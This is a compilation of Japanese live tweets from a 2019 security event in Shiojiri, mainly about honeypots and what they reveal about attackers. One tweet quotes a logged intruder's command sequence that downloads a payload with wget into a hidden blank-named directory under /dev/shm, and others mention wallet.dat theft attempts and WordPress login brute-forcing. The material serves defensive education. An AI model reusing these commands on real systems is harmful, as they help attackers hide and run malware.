-
ohhara_shiojiri
- 2897
- 9
- 0
- 0
![](https://tgfile.tg-static.com/static/web/img/placeholder.gif)
イベント:ライブ配信開始。今度は以下のURLです。 twitter.com/openspc/status… #shiojiri_oss
2019-02-16 16:32:53![](https://tgfile.tg-static.com/static/web/img/placeholder.gif)
攻撃者はビジネス目的でやってくるが、まずはそのコンピュータを攻略する、という点からハニーポットの観察は有効 #shiojiri_oss
2019-02-16 16:32:16![](https://tgfile.tg-static.com/static/web/img/placeholder.gif)
イベント:/backup/bitcoin/wallet.dat 閲覧を試みているファイルはwallet.dat バックアップディレクトリが狙われている。 #shiojiri_oss
2019-02-16 16:28:48![](https://tgfile.tg-static.com/static/web/img/placeholder.gif)
イベント: GET /wordpreess/wp-login.php HTTP/1.1 「ワードプレスを使いたいんだな、はいWordPress動いてますよ、どうぞ」 ログインブルート攻撃がやってくる #shiojiri_oss
2019-02-16 16:11:20![](https://tgfile.tg-static.com/static/web/img/placeholder.gif)
イベント:攻撃者をおもてなしするWOW Honeypotの紹介。 攻撃者が見たいものを用意しておくのが、これ。 #shiojiri_oss
2019-02-16 16:10:00![](https://tgfile.tg-static.com/static/web/img/placeholder.gif)
イベント:不正ログインの形跡。以下は実際のコマンド。空白のディレクトリを作るのがポイント w uname -a make ftp cd /dev/shm mkdir " " cd " " wget ファイルがあるURL >>>gosh.tgza.tar rm 0rf gosh,tgz,tar cd gosh #shiojiri_oss
2019-02-16 16:08:08![](https://tgfile.tg-static.com/static/web/img/placeholder.gif)
イベント:iPhoneもハニーポットだと思っている。 電車などで近くにいる人に怪しい画像を送って相手の反応を見るという嫌がらせが発生している。 #shiojiri_oss
2019-02-16 16:06:10![](https://tgfile.tg-static.com/static/web/img/placeholder.gif)
イベント:SSHハニーポット SSHでリモートアクセスしてきた攻撃者の入力されたOSコマンドを記録し観察することができる。 Webハニーポット HTTPの要求内容を受け付けてWebアプリケーションの脆弱性やファイルの調査などの行動を観察することができる。 #shiojiri_oss
2019-02-16 16:05:00![](https://tgfile.tg-static.com/static/web/img/placeholder.gif)
イベント:ハニーポット関係の資料は後で公開されます。 後で公開される資料は、個人的に収集したものになります。 ハニーポットが好きで勉強会や交流会などを開いている 東京だけでは増えないので、大阪に行ったり他のところに行ったりしている #shiojiri_oss
2019-02-16 16:00:09![](https://tgfile.tg-static.com/static/web/img/placeholder.gif)
イベント:SPREADの講演おわり。 次はハニーポット関係ですが、都合によりオフレコになっています。 中継も停止します。 #shiojiri_oss
2019-02-16 15:57:06![](https://tgfile.tg-static.com/static/web/img/placeholder.gif)
イベント:SPREAD×シスコネットワーキングアカデミー サイバーセキュリティについてWebで受講できるセミナー #shiojiri_oss
2019-02-16 15:49:06![](https://tgfile.tg-static.com/static/web/img/placeholder.gif)
イベント:参加型セミナー まずセミナーの受講 次に参加者同士でディスカッション 過去のテーマとして「SNSの設定どうしてる?」「災害×ITもしもの時のセキュリティ」「やってみよう大人のフィルタリング」 #shiojiri_oss
2019-02-16 15:47:31